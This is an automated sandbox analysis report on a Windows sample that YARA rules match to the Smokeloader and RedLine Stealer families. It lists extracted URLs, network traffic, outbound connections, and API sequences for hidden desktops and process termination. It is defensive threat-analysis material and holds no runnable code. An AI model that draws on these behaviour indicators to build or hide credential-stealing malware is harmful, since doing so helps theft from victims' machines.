          Source: chrome.exe, 0000000A.00000002.1565881543.0000782402E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
          Source: chrome.exe, 0000000A.00000002.1565810314.0000782402DD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
          Source: chrome.exe, 0000000A.00000003.1487654825.00007824032C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
          Source: chrome.exe, 0000000A.00000002.1567799455.000078240349C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
          Source: chrome.exe, 0000000A.00000002.1563791843.00007824029F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566658146.0000782402FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564747541.0000782402B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
          Source: chrome.exe, 0000000A.00000002.1563791843.00007824029F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566658146.0000782402FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564747541.0000782402B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
          Source: dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B3F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564865767.0000782402B70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563015930.0000782402844000.00000004.00000800.00020000.00000000.sdmp, Web Data.15.dr, VKXB16.0.dr, OPHDT2.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: chrome.exe, 0000000A.00000002.1561929136.000078240260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1529339632.0000782403DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1527407229.0000782403534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1536160994.0000782403F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1532379200.0000782403E4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1531865338.0000782403E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1527160907.0000782403E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
          Source: chrome.exe, 0000000A.00000003.1527160907.0000782403E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
          Source: chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
          Source: chrome.exe, 0000000A.00000002.1562165163.0000782402681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
          Source: chrome.exe, 0000000A.00000002.1565010392.0000782402BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
          Source: chrome.exe, 0000000A.00000003.1526960833.0000782402494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
          Source: chrome.exe, 0000000A.00000002.1554280885.000078240221C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
          Source: chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
          Source: chrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
          Source: chrome.exe, 0000000A.00000002.1560852461.000078240240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: chrome.exe, 0000000A.00000002.1564953387.0000782402BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: chrome.exe, 0000000A.00000002.1566597021.0000782402F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562261418.00007824026A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
          Source: chrome.exe, 0000000A.00000003.1527160907.0000782403E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
          Source: chrome.exe, 0000000A.00000003.1531502000.00007824031A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1536160994.0000782403F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1532379200.0000782403E4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1531865338.0000782403E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1568832462.0000782403E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1531583673.0000782403E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1527160907.0000782403E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
          Source: chrome.exe, 0000000A.00000003.1527160907.0000782403E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.kK1dM3um3so.2019.O/rt=j/m=q_dnp
          Source: chrome.exe, 0000000A.00000003.1527160907.0000782403E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
          Source: dZKPE9gotO.exe, 00000000.00000002.2207976235.0000000003EF1000.00000004.00000020.00020000.00000000.sdmp, dZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B9B000.00000004.00000020.00020000.00000000.sdmp, AIWTJM.0.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
          Source: dZKPE9gotO.exe, 00000000.00000002.2208701132.00000000040D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
          Source: dZKPE9gotO.exe, 00000000.00000002.2208701132.00000000040D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
          Source: dZKPE9gotO.exe, 00000000.00000002.2208701132.00000000040D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
          Source: dZKPE9gotO.exe, 00000000.00000002.2208701132.00000000040D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: dZKPE9gotO.exe, 00000000.00000002.2208701132.00000000040D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.office.com
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
          Source: 79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
          Source: chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
          Source: chrome.exe, 0000000A.00000002.1561375774.00007824024C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565327908.0000782402C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50858
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50858 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
          Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
          Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
          Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
          Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
          Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
          Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.7:49701 version: TLS 1.2
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040AB8F memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpyA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop,0_2_0040AB8F

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
          Source: 00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_00409EF00_2_00409EF0
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0040996B0_2_0040996B
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_004200400_2_00420040
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0041D6270_2_0041D627
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_0041F3CD0_2_0041F3CD
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009CD88E0_2_009CD88E
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009D02A70_2_009D02A7
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009CC2010_2_009CC201
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009CF6340_2_009CF634
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B5D920_2_009B5D92
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009B9BD20_2_009B9BD2
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009C09370_2_009C0937
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_009BA1570_2_009BA157
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 3064
          Source: dZKPE9gotO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: dZKPE9gotO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@69/287@22/18
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeCode function: 0_2_004152A5 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_004152A5
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\90QIEYSH.htmJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2000
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8340:120:WilError_03
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user~1\AppData\Local\Temp\287b9929-2388-40f9-a4b3-c1eacd0c33aa.tmpJump to behavior
          Source: dZKPE9gotO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
